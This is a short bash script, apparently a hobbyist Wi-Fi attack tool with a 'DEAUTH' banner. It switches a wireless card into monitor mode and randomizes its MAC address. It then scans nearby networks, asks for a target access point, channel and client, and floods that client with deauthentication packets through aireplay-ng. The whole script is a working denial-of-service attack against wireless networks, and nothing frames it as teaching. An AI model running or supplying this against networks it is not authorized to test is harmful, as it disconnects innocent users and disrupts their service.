#!/bin/bash

iface="wlan0"

x=0
while [ $x = 0 ]
do
	clear
	echo ""
	echo ""
	echo -e "       \e[1;32m_____     ______     ______     __  __     ______   __  __    \e[0m"
	sleep 0.01
	echo -e "      \e[1;32m/\  __-.  /\  ___\   /\  __ \   /\ \/\ \   /\__  _\ /\ \_\ \   \e[0m"
	sleep 0.01
	echo -e "      \e[1;32m\ \ \/\ \ \ \  __\   \ \  __ \  \ \ \_\ \  \/_/\ \/ \ \  __ \  \e[0m"
	sleep 0.01
	echo -e "       \e[1;32m\ \____-  \ \_____\  \ \_\ \_\  \ \_____\    \ \_\  \ \_\ \_\ \e[0m"
	sleep 0.01
	echo -e "        \e[1;32m\/____/   \/_____/   \/_/\/_/   \/_____/     \/_/   \/_/\/_/\e[0m  \e[37m-By Ed\e[0m"
	echo "" 
	echo ""
	echo ""
	echo " Options:"
	echo ""
	echo "  [1] Start" 
	echo ""
	echo "  [2] Exit Monitor Mode"
	echo ""
	echo ""
	read answer
	
	case "$answer" in
	1)
	sudo airmon-ng stop "$iface"mon

	sudo airmon-ng start $iface

	sudo ifconfig "$iface"mon down

	sudo macchanger -r "$iface"mon;sleep 2

	sudo ifconfig "$iface"mon up

	sudo airodump-ng "$iface"mon

	echo "bssid:"
	read 'bssid'

	echo "channel:"
	read 'channel'

	sudo airodump-ng --bssid $bssid --channel $channel "$iface"mon

	echo "mac:"
	read 'mac'

	echo "number of packets:"
	read 'p'

	sudo aireplay-ng -0 $p -a $bssid -c $mac "$iface"mon;sudo airmon-ng stop "$iface"mon
	sudo ./deauth
	x=1	
	;;
	2)
	sudo airmon-ng stop "$iface"mon
	sudo ./deauth
	sleep 2
	x=1
	;;
	*) 
	clear
	echo "Unknown command"
	sleep 1
	;;
	
	
	

esac

done
